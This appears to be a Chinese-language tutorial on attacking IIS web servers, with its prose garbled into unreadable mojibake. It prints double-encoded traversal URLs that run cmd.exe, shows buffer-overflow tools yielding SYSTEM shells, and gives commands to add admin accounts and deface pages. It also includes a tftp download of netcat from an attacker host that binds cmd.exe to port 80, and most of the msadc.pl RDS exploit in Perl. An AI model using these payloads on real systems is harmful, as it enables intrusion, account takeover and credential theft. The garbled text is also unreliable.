¨Ò¦p¡A¹ï©ó'\'³o­Ó¦r¤¸¡A¥¿±`½s½X«á¬O%5c¡C³o¤T­Ó¦r¤¸¹ïÀ³ªº½s½X¬°¡G
'%' = %25
'5' = %35
'c' = %63
¦pªG­n¹ï³o¤T­Ó¦r¤¸¦A°µ¤@¦¸½s½X¡A´N¥i¥H¦³¦hºØ§Î¦¡¡A¨Ò¦p¡G
%255c
%%35c
%%35%63
%25%35%63
...

¦]¦¹¡A"..\"´N¥i¥Hªí¥Ü¦¨"..%255c"©Î"..%%35c"µ¥µ¥§Î¦¡¡C


¥i¥H¬Ý¥X¡A¸Óº|¬}»Punicodeº|¬}¦b¹B¥Î¤W¦³µÛ¬Û¦ü¤§³B¡C

¦pªG¥Ø¼Ð¥D¾÷¦s¦b¤@­ÓµêÀÀ¥i°õ¦æ¥Ø¿ý(scripts)¡A¨Ã¥B¥¦»P

windows¨t²Î¦b¦P¤@ÅX°Ê¾¹¤W¡C¨º»ò¦b¬yÄý¾¹´£¥æ½Ð¨D¡G

http://¥Ø¼Ð¥D¾÷ip/scripts/..%25%35%63..%25%35%63cwinnt/system32/cmd.exe?/c+dir+c:\

¥i¥H¦C¥X»·ºÝ¥D¾÷ªºc½L®Ú¥Ø¿ý¡G

®Ú¾Úºñ·ùªº¤½§i¡A¸Óº|¬}½s½X§Î¦¡ÁÙ¦³¡G

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c

/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c

/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c

/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c

/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c

¡]À³¸ÓÁÙ¦³§ó¦h¡^
ºô¤W¦³±Mªùªº±½´y¾¹¡C¦Ü©óº|¬}§Q¥Îªº¸Ô²Ó§Q¥Î¡A¥i¥H°Ñ¦Ò¡municode½s½Xº|¬}¥þ§ð²¤¡n¡]1-8¡^¡C


--------------IIS 5.0 .printer»·µ{½w½Ä°Ï·¸¥Xº|¬}¡]ISAPI¡^----------------

·L³nWin 2K IIS 5ªº¦C¦LISAPIÂX®i¤¶­±«Ø¥ß¤F.printer°ÆÀɦW¨ìmsw3prt.dllªº¬M®gÃö«Y¡A¯Ê¬Ù±¡ªp¤U¸Ó¬M®g¦s¦b¡C·í»·ºÝ¥Î¤á´£¥æ¹ï.printerªºURL½Ð¨D®É¡AIIS 5½Õ¥Îmsw3prt.dll¸ÑÄÀ¸Ó½Ð¨D¡C¥Ñ©ómsw3prt.dll¯Ê¥F¨¬°÷ªº½w½Ä°ÏÃä¬ÉÀˬd¡A»·ºÝ¥Î¤á¥i¥H´£¥æ¤@­Óºë¤ßºc³yªº°w¹ï.printerªºURL½Ð¨D¡A¨ä"Host:"°ì¥]§t¤j¬ù420¦ì¤¸²Õªº¼Æ
¾Ú¡A¦¹®É¦bmsw3prt.dll¤¤µo¥Í¨å«¬ªº½w½Ä°Ï·¸¥X¡A¼ç¦b¤¹³\°õ¦æ¥ô·N¥N½X¡C·¸¥Xµo¥Í«á¡AWEBªA°È°±¤î¦^À³¡AWin 2K¥i¥HÀˬd¨ìWEBªA°È°±¤î¦^À³¡A±q¦Ó¦Û°Ê­«±Ò¥¦¡A¦]¦¹¨t²ÎºÞ²z­û«ÜÃø·NÃѨìµo¥Í¹L§ðÀ»¡C
³o­Óº|¬}«D±`¦MÀI¡A¦]¬°¥¦¶È¶È»Ý­nWIN2000¥´¶}80°ð(http)©ÎªÌ443ºÝ
¤f(https)¡A·L³n¤½¥q±j¯P­n¨D¦b¥¼¥´¸É¤B¤§«e¤@©w­n²¾°£ISAPIºô¸ô¦C¦Lªº¬M®g¡C
ISAPI (Internet Services Application Programming Interface)ºô»Úºô¸ôªA°È
À³¥Î½sµ{¤¶­±¬O¤@ºØ¯à°÷¨Ïºô¸ô¶}µo°Ó³q¹L½s¼g¯à¬°ºô¸ôªA°È¾¹´£¨Ñ·sªºªA°Èªº
¦Û©w¸q©R¥O½X¨ÓÂX®iºô¸ôªA°È¾¹¥\¯àªº¤@ºØ§Þ³N¡C
¸Ó¦Û©w¸q©R¥O½X¬J¯à¦bISAPI¿zÀ˵{¦¡¤¤§¹¦¨(·í·sªº¥\¯à©Ò´£¨Ñ¤@ºØ¸û§C¤ô¥­ªºªA
°È®É)¡F¤]¯à¦bISAPIÂX®i¶µ¤¤§¹¦¨(·í·sªº¥\¯à´£¨Ñ¤@ºØ¸û°ª¤ô¥­ªA°È®É)¡C²{¦b¡A
³Q·¸¥Xªº¥N½X´N¬O³oISAPIÂX®i¡C
¥Ñ©ó¡A³o­Óº|¬}¦s¦b»PwebªA°È°ð¡A©Ò¥H¡A¹ï¶}³]http©ÎhttpsªA°È¥\¯àªº¥D¾÷¨Ó»¡¡A³s©ñ¤õÀð¤]¤£¯àªý¤î§Q¥Î³o­Ó¥\¯à¡C
¥t¥~¡A¸Óº|¬}¤£¼vÅTiis 4.0ªº¦øªA¾¹¡C

¬ÛÀ³ªº§ðÀ»µ{¦¡¦³3ºØ¡]¦Ü¤Ö§Úª¾¹D³o¤T¡^¡C

1¡B¤pº_ªºIIS5Exploit
ÄY®æ¦a»¡¡A³o³nÅé¨Ã¤£¬O¤pº_¼gªº¡A³o³nÅé¬O¤pº_®Ú¾Újill.c§ï½sÀu¤Æ³¡¤À¥N
½X½sĶ¥X¨Óªº¡C¤£¹L³o³nÅé½T¹ê«Ü¦n¡A¯S§O±ÀÂˤj®a¨Ï¥Î¡C
¤U¸ü¦a§}http://www.netxeyes.com/IIS5Exploit.zip
À£ÁY¥]ùاt¦³¤T­ÓÀÉIIS5Exploit.exe¡Bnc.exe¡Breadme.txt
IIS5 .Printer Exploit ¨Ï¥Î»¡©ú
-----------------¥H¤U¬Oreadme.txtªº¤º®e
¥»µ{¦¡¾A¥Î¤_­^¤åª©IIS 5.0
1¡B­º¥ý¦b¥»¾÷¥ÎNC¶}¤@­ÓºÊÅ¥°ð¡C
C:\>nc -l -p 99
2¡B¹B¦æIIS5Exploit
D:\>jill xxx.xxx.xxx.xxx 211.152.188.1 333
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001. http://www.netXeyes.com===
Connecting 211.152.188.1 ...OK.
Send Shell Code ...OK
IIS5 Shell Code Send OK
¨ä¤¤211.152.188.1«ü¦V¥»¦aIP¡C
µyµ¥¤ù¨è¡A¦pªG¦¨¥\¦b¥»¾÷NCºÊÅ¥ªº°ð¥X²{¡G
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
¥i¥H°õ¦æ©R¥O¡C¦p¡G
C:\>net user hack password /add
The command completed successfully.
C:\>net localgroup administrartors hack /add
³o¼Ë´N³Ð«Ø¤F¤@­ÓÄÝ©óAdministrator²Õªº¥Î¤áHack,±K½X¬°password.
-----------------------------------------------------------------
¨Ï¥Î»¡©ú¸ÑÄÀ¡G
¨Ï¥Î³o³nÅé¹ê»Ú¤W­n¶}¨â­ÓMS-DOSµøµ¡¡A­º¥ý¹B¦ænc -l -p 99 ·íµM¤]¥i¥H
§â°ð©w¸q¬°¨ä¥Lªº¡CµM«á¡A¥´¤J¡G IIS5Exploit ¥Ø¼Ð¥D¾÷ªºIP ¦Û¤vªºIP 99(­n»P¦Û¤vNC¶}ªº°ð¤@­P)
¬°¤F§ðÀ»ªº¦¨¥\²v°ª¡A­º¥ý¥²¶·­n©ú½T©Ò§ðÀ»ªº¥Ø¼Ð¥D¾÷¤@©w¬O¶}¦³
http\httpsªA°Èªºwin2k¡C
¤]¥i¥H¥Îeyas´£¨ÑªºScanPrinter¨Ó±½´yÀò±o¡C

2¡Bisno´£¨Ñªºcniis¡Biisx
isno³Ì·sªº.printerº|¬}§ðÀ»³nÅé¬Oiisx¡A¬OCNIISªº¤É¯Åª©¥»¡A«ö§ä§@ªÌªº
¨Ï¥Î»¡©ú§Ú­Ì¥i¥H¬Ý¨ì¡G
¨Ï¥Î¤èªk: iisx <¥Ø¼Ð¥D¾÷> <sp> <-p|-a|-r attackhost attackport>

sp: 0 --- ¥Ø¼Ð¨S¦³¦w¸ËSP , 1 --- ¥Ø¼Ð¦w¸Ë¤FSP1

´£¨Ñ¤TºØ¹ïIIS5 .printerº|¬}ªº§ðÀ»¤è¦¡¡G

-p --- ¹ï§ðÀ»¥Ø¼Ð¹B¦æiisx 66.77.88.99 0 -p
¦b66.77.88.99¤W¶}¤@­Ó°ð7788,¥i¥Hª½±µtelnet 66.77.88.99 7788

-a --- ¹ï§ðÀ»¥Ø¼Ð¹B¦æiisx 66.77.88.99 0 -a
¦b66.77.88.99¤W²K¥[¤@­ÓºÞ²z­û±b¸¹¡Ghax¡A¨ä±K½X¤]¬°hax,
¥i¥H¨Ï¥Înet use \\66.77.88.99\ipc$ "hax" /user:"hax"«Ø¥ß³s±µ¡C

-r --- ¤Ï¦V³s±µ¡]Ãþ¦ü©ójillªº¤è¦¡¡^¡A¨ãÅé¹ê¬I¤èªk¦p¤U¡G

¨Ò¦p¥ý¦b¤@¥x¾÷¾¹111.222.333.444¤W¹B¦ænc -vv -l -p 5432,
µM«á¹ï§ðÀ»¥Ø¼Ð¹B¦æiisx 66.77.88.99 0 -r 111.222.33.444 5432,
³o®É¦b111.222.333.444´N·|¥X²{¨Ó¦Û66.77.88.99ªº³s±µ¡C


3¡Bsunx.org´£¨Ñªºiis5hack
¹B¦æ°Ñ¼Æ
iis5hack <¥Ø¼Ð¥D¾÷IP> <WEB°ð80> <¥D¾÷Ãþ«¬>

¤¤¤åWIN2K: 0
¤¤¤åWIN2K sp1: 1
­^¤åWIN2K: 2
­^¤åWIN2K, sp1: 3
¤é¤åWIN2K: 4
¤é¤åWIN2K, sp1: 5

E:\HACK\print>iis5hack 63.110.130.66 80 3
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
Now you can telnet to 99 port
good luck Smile

c:\telnet 63.110.130.66 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
¤w¸g¶i¤J¥Ø¼Ð¥D¾÷¡A§A·Q·F¤°»ò´N¬O§Aªº¨Æ°Õ¡C¸Ó³nÅ骺ÀuÂI¬O°w¹ï¦hºØ»y
¨¥ª©¥»ªºWIN2K¨t²Î¡A¯ÊÂI¡A·¸¥X¦¨¥\«á¥Ø¼Ð¥D¾÷ªºIIS°±¤îªA°È¡A¨Ã¥B±o¨ì
SHELL«á­n¦b¸ûµu®É¶¡¤º§¹¦¨§A·Q°µªº¨Æ¡A®É¶¡ªøªº¸Ü³sSHELL¡BIIS³£·|¦º
±¼¡F¤£¯àÀH·N©w¸q¥Ø¼Ð¥D¾÷ªºSHELL°ð¡C¦b°h¥XTELNETªA°È®É¤]¤@©w­n°O¦í
¥¿±`exit°h¥X¡A§_«h¥Ø¼Ð¥D¾÷ªºIIS¤]·|¦º¡C

---------------------------------

³oùØ»¡¨ìiis5hack¡A¤SÅý§Ú·Q°_¤F¥t¥~¤@­Ó³nÅé¡K¡K

-----------IIS HACK-------------
»¡°_¨ÓºF·\¡A§Ú³Ì¦­¬O¦b¤@¥÷¹q¸£Âø»x¤W¤]¦³¬Ý¨ì¥Lªº¤¶²Ð¡C
www.eeye.comªº¤H­ûµo²{¤F¤@­ÓIIS4.0ªº½w½Ä·¸¥X¥i¥H¤¹³\¥Î¤á¤W¸ü
µ{¦¡¡A¦pnetcat¨ì¥Ø¼Ð¦øªA¾¹¡A¨Ã§âcmd.exe¸j©w¨ì80¤f¡C³o­Ó½w½Ä·¸
¥X¥D­n¦s¦b©ó.htr,.idc©M.stmÀɤ¤¡A¨ä¹ïÃö©ó³o¨ÇÀɪºURL½Ð¨D
¨S¦³¹ï¦W¦r¶i¦æ¥R¤ÀªºÃä¬ÉÀˬd¡A¾É­P¹B¦æ§ðÀ»ªÌ´¡¤J¤@¨Ç«áªùµ{¦¡
¦b¨t²Î¤¤¤U¸ü©M°õ¦æµ{¦¡¡C
§A»Ý­n¤@¥x¦Û¤vªºWEB¦øªA¾¹¡A ·íµM§A¥i¥H¬OµêÀÀ¦øªA¾¹®@¡C¦p¡G©ñ¨ì¦Û¤vªº¥D­¶ªÅ¶¡©Î¦×Âû¤W¤]¥i¥H°Õ¡I

§A²{¦b§A¦Û¤vªºWEB¦øªA¾¹¤W¹B¦æWEBªA°Èµ{¦¡¨Ã§âncx.exe©ñ¨ì§A¦Û¤v¬ÛÀ³
ªº¥Ø¿ý¤U¡AµM«á¨Ï¥Îiishack.exe¨ÓÀˬd¥Øªº¾÷¾¹¡G
c:\>iishack.exe <victim> 80 <your web server>/ncx.exe
µM«á§A´N¨Ï¥Înetcat¨Ó³s±µ§A­nÀË´úªº¦øªA¾¹¡G
c:\>nc <victim> 80
¦pªG·¸¥XÂI¥¿½T§A´N¥i¥H¬Ý¨ì¥Øªº¾÷¾¹ªº©R¥O¦æ´£¥Ü¡A¨Ã¥B¬OºÞ²z»·³\¥iÅv¡C

----------------IIS Index Server(.ida/idq) ISAPIÂX®i»·µ{·¸¥Xº|¬}---------------
·L³nIIS¯Ê¬Ù¦w¸Ë±¡ªp¤U±a¤F¤@­Ó¯Á¤Þ¦øªA¾¹(Index Server,¦bWindows 2000¤U¦W¬°"Index Service").¯Ê¬Ù¦w¸Ë®É¡AIIS¤ä´©¨âºØ¸}¥»¬M®g¡GºÞ²z¸}¥»(.idaÀÉ)¡BInernet¸ê®Æ¬d¸ß¸}¥»(.idq¤å¥ó)¡C³o¨âºØ¸}¥»³£¥Ñ¤@­ÓISAPIÂX®i - idq.dll¨Ó³B²z©M¸ÑÄÀ¡C
¥Ñ©óidq.dll¦b³B²z¬Y¨ÇURL½Ð¨D®É¦s¦b¤@­Ó¥¼¸gÀˬdªº½w½Ä°Ï¡A¦pªG§ðÀ»ªÌ´£¨Ñ¤@­Ó¯S®í®æ¦¡ªºURL,´N¥i¯à¤Þµo¤@­Ó½w½Ä°Ï·¸¥X¡C³q¹Lºë¤ßºc³yµo°e¸ê®Æ¡A§ðÀ»ªÌ¥i¥H§ïÅܵ{¦¡°õ¦æ¬yµ{¡A°õ¦æ¥ô·N¥N½X¡C
¦¨¥\¦a§Q¥Î³o­Óº|¬},§ðÀ»ªÌ¥i¥H»·ºÝÀò¨ú"Local System"³\¥iÅv¡C ¡]¼g¨ì³oùتº®É­Ô¡Aµ¡¥~Ãz¦ËÁnÆJ°_¡A¹sÂIªºÄÁÁnºVÅT¤F¡C¦b³oùØÂÔ¥H¦¹¤å¯¬¶P¤õ¤B¤S¤j¤F¤@·³¡I²{¦b¬O°¨¦~¤F¡C¦n§x¡K¡KºÎ¤F¡C¡^

xfocusªºisno¤½§G¤F¤@¬q§ï¨}«áªº§ðÀ»¥N½X¡A¦pªG¦³¿³½ì¥i¥H§ä­ì¥N½XŪ¤@¤U¡A³oùØ´N¤£°µ¤¶²Ð¤F¡C§Ú­ÌÁÙ¬O¨Ó¬Ý¬Ý«ç»ò§ðÀ»^_^¡C
¦³¨â­Óµ{¦¡¡AISMiscOverflowV1_Build0010.exe©MIISIDQOverflowV1_Build0010.exe
¬Osnake°µªº¡A¥i¥H¨ìhttp://snake12.top263.net¥Lªº­Ó¤H¥D­¶¤U¸ü¡C¤U¸ü¹B¦æ«eªÌ¥X²{¤Fµ{¦¡ªº¥D¤¶­±.
¬Ý¬Ý¹ê¾Ô§a~~~ ­º¥ý§ä¨ì¦³.idqº|¬}ªº¾÷¾¹,¬y¥ú¥i¥H±½´y¨ì.«Ü¦hªº.ÀH«K¨Ó¤@­Ó.
¦b³Q§ðÀ»IP¦a§}«á­±¼g¤W¹ï¤èªºIP.°ð¸¹¤@¯ë¤£»Ý­n§ï°Ê. ¥ª­±¿ï¾Ü§@·~¨t²ÎÃþ«¬.¥ý¿ï¾ÜIIS5 English Win2k Sp0§a~ ³nÅ骺Àq»{¸j©wCMD.EXEªº°ð¬O813.¤£§ï¤F.¥ÎÀq»{§a~~~ ÂIÀ»IDQ·¸¥X~~OK~~¥X²{µo°eShellcode¦¨¥\ªº´£¥Ü¤F.
³£»¡nc¤ñtelnet±j¤j.¥Înc§a~
c:\windows>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK

c:\windows>
¬Ý¨Ó¨S¦¨¥\. ¦A¨Ó¤@¦¸¤F!
´«¥ÎIIS5 English Win2k Sp1¦A¸Õ!
c:\windows>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK!!!~~~§A¤£¥Î¦b¦V¥Îunicode¨º¼Ë®`©È³\¥iÅv¤£°÷¤F.§A²{¦b¥i¬Osystem³\¥iÅv.


±µ¤U¨Ó´N¬OIISIDQOverflowV1_Build0010.exe¤F¡I¬°¤F¤è«K¡A¥i¥H§â¥L§ï¦W¤ñ¦pidq.exe
¦bDOSª¬ºA¤U¡]°²³]idq.exe¦bc:\¤U¡^
c:\idq.exe
¹B¦æ°Ñ¼Æ: §@·~¨t²ÎÃþ«¬ ¥Øªº¦a§} web°ð ·¸¥X°ð

¤ä´©ªº§@·~¨t²Î Ãþ«¬: ----
0 -- IIS5¤¤¤åWin2k Sp0
1 -- IIS5¤¤¤åWin2k Sp1
2 -- IIS5¤¤¤åWin2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2

IIS5 IDQ Overflow. by snake. (http://snake12.top263.net) 2000/07
c:\>idq 3 XXX.XXX.XXX.XXX80 456
³s±µ¥Øªº¾÷¾¹ XXX.XXX.XXX.XXX:80 OK.
µo°eshellcode ¨ì XXX.XXX.XXX.XXX:80 OK
²{¦b¡A§A¥i¥H ³s±µ ¸Ó¥D¾÷ªº °ð 456¤F,good luck.!

c:\>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK

¨S¦¨¥\.¸Õ¸Õsp1.
c:\>idq 4 XXX.XXX.XXX.XXX 80 888
³s±µ¥Øªº¾÷¾¹ XXX.XXX.XXX.XXX:80 OK.
µo°eshellcode ¨ì XXX.XXX.XXX.XXX:80 OK
²{¦b¡A§A¥i¥H ³s±µ ¸Ó¥D¾÷ªº °ð 888¤F,good luck.!
c:\>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
¨þ¨þ¡IOK!²{¦b§A·Q·F¤°»ò°Ú¡I

--------------MDAC- ¥»¦a©R¥O°õ¦æ(msadcs.dll )----------------

³o­Óº|¬}¬O¤ñ¸û¦Ñ¤F¡A¥iºô¸ô¦p¦¹¤§¤j¡A¥i¯àÁÙ¦³¦n¦hIIS WEBªA°È
¾¹¦s¦b³o­Óº|¬}°Õ¡CIISªºMDAC¤¸¥ó¦s¦b¤@­Óº|¬}¥i¥H¾É­P§ðÀ»ªÌ»·ºÝ°õ¦æ
§A¨t²Îªº©R¥O¡C¥D­n®Ö¤ß°ÝÃD¬O¦s¦b©óRDS Datafactory¡AÀq»{±¡ªp¤U¡A
¥¦¤¹³\»·ºÝ©R¥Oµo°e¨ìIIS¦øªA¾¹¤¤¡A³o©R¥O·|¥H³]³Æ¥Î¤áªº¨­¥÷¹B¦æ¡A
¨ä¤@¯ëÀq»{±¡ªp¤U¬OSYSTEM¥Î¤á¡CÃö©ó³o­Óº|¬}ªº´y­z¡A«Ü¦h¤å³¹¤¶²Ð
ªº«Ü²M·¡¡A³oùؤ£°µ¸Ô²Ó¸ÑÄÀ¡A§A¦pªG­n¹ï¦Û¤vªº¯¸ÂI¶i¦æÀˬd¬O§_¦s¦b
³o­Óº|¬}¡A§A¥i¥H³q¹L¤U­±ªº¾Þ§@¡G

c:\>nc -nw -w 2 <victim> 80
GET /msadc/msadcs.dll HTTP

¦pªG§A±o¨ì¤U­±ªº¸ê°T¡G

application/x_varg

´N«Ü¦³¥i¯à¨S¦³¥´¤W¸É¤B¨Ã¦s¦b¦¹º|¬}¡A§A¥i¥H¨Ï¥Î³o¨â­Óµ{¦¡¶i¦æ´ú¸Õ mdac.pl©Mmsadc2.pl ¡C

c:\> mdac.pl -h <victim>
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c

OK¡A¦pªG§A­n´À´«¹ï¤èªº¥D­¶¡A§A´N¥i¥H¨Ï¥Î¤U­±ªº¤èªk¡G

cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm

©ÎªÌ¨ä¥L©R¥O¡A·íµM³Ì¦nªº¤èªk§Úı±oÁÙ¬O¨Ï¥Î¤W¸ü§Ú­Ìªºnetcat¡A¨Ã
§âCMD.EXE¸j©w¨ì°ð80¤W¡A§Ú­Ì¥i¥H³]¸m§Ú­Ì¦Û¤vªºTFTPªA°Èµ{¦¡¨Ã§â
nc.exe©ñ¤W¥h¡AµM«á¦b°õ¦æ©R¥O¡A¦p¡G

cmd/c cd %systemroot%&&tftp -i <evil_hacker> GET nc.exe&&del ftptmp
&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe

µM«á§A´N³s±µ¨ì80¤f¡A±o¨ì¤@­ÓSHELL¤fÅý§A¬yÄý¡C¨þ¨þ¡I¦pªG¡A¹ï¤è¶}5631©Î3389
§AÁÙ¥i¥H§ì*.cif©Îsamªº±K½X¤åÀɤU¨Ó¡A¶]±K½X¡C

¤U­±´£¨Ñmdac.plªºperl¥N½X¡C

#!perl
#
# MSADC/RDS 'usage' (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!

use Socket; use Getopt::Std;
getopts("e:vd:h:XR", \%args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";

if (!defined $args{h}&& !defined $args{R}){
print qq~
Usage: msadc.pl -h <host>{ -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-v = verbose
-e = external dictionary file for step 5

Or a -R will resume a command session

~; exit;}

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}){ $verbose=1; }else{$verbose=0;}
if (defined $args{d}){ $delay=$args{d};}else{$delay=1;}
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (defined $args{X}&& !defined $args{R}){ &hork_idx; exit; }

if (!defined $args{R}){ $ret = &has_msadc;
die("Looks like msadcs.dll doesn't exist\n")if $ret==0}

print "Please type the NT commandline you want to run (cmd /c assumed):\n"
. "cmd /c ";
$in=<STDIN>; chomp $in;
$command="cmd /c " . $in ;

if (defined $args{R}){& exit;}

print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;

print "\nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>\n" : print "<<fail>>\n";

print "\nStep 3: Trying known DSNs...";
&known_dsn;

print "\nStep 4: Trying known .mdbs...";
&known_mdb;

if (defined $args{e}){
print "\nStep 5: Trying dictionary of DSN names...";
&dsn_dict; }else{ "\nNo -e; Step 5 skipped.\n\n"; }

print "Sorry Charley...maybe next time?\n";
exit;

##############################################################################

sub sendraw{ # ripped and modded from whisker
sleep($delay); # it's a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
}else{ die("Can't connect...\n"); }}

##############################################################################

sub make_header{ # make the HTTP request
my $msadc=<<EOT
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen

EOT
; $msadc=~s/\n/\r\n/g;
return $msadc;}

##############################################################################

sub make_req{ # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;

if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City=" . make_shell();
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}

elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C=" . make_shell();
$dsn="$p1";}

elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}

elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}

$t1= make_unicode($query);
$t2= make_unicode($dsn);
$req = "\x02\x00\x03\x00";
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}

##############################################################################

sub make_shell{ # this makes the shell() statement
return "'|shell(\"$command\")|'";}

##############################################################################

sub make_unicode{ # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++){ $out.=substr($in,$c,1) . "\x00"; }
return $out;}

##############################################################################

sub rdo_success{ # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}

##############################################################################

sub make_dsn{ # this makes a DSN for us
my @drives=("c","d","e","f");
print "\nMaking DSN: ";
foreach $drive (@drives){
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200"){
foreach $line (@results){
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
}return 0;}

##############################################################################

sub verify_exists{
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}

##############################################################################

sub try_btcustmr{
my @drives=("c","d","e","f");
my @dirs=("winnt","winnt35","winnt351","win","windows");

foreach $dir (@dirs){
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives){
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;

my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
else{ verbose(odbc_error(@results)); funky(@results);}}print "\n";}}

##############################################################################

sub odbc_error{
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose{
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}

##############################################################################

sub save{
my ($p1, $p2, $p3, $p4)=@_;
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
close OUT;}

##############################################################################

sub load{
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=; close(IN);
$ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
$p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g;
if($p[1]==1){
$reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
if (rdo_success(@results)){print "Success!\n";}
else{ print "failed\n"; verbose(odbc_error(@results));}}
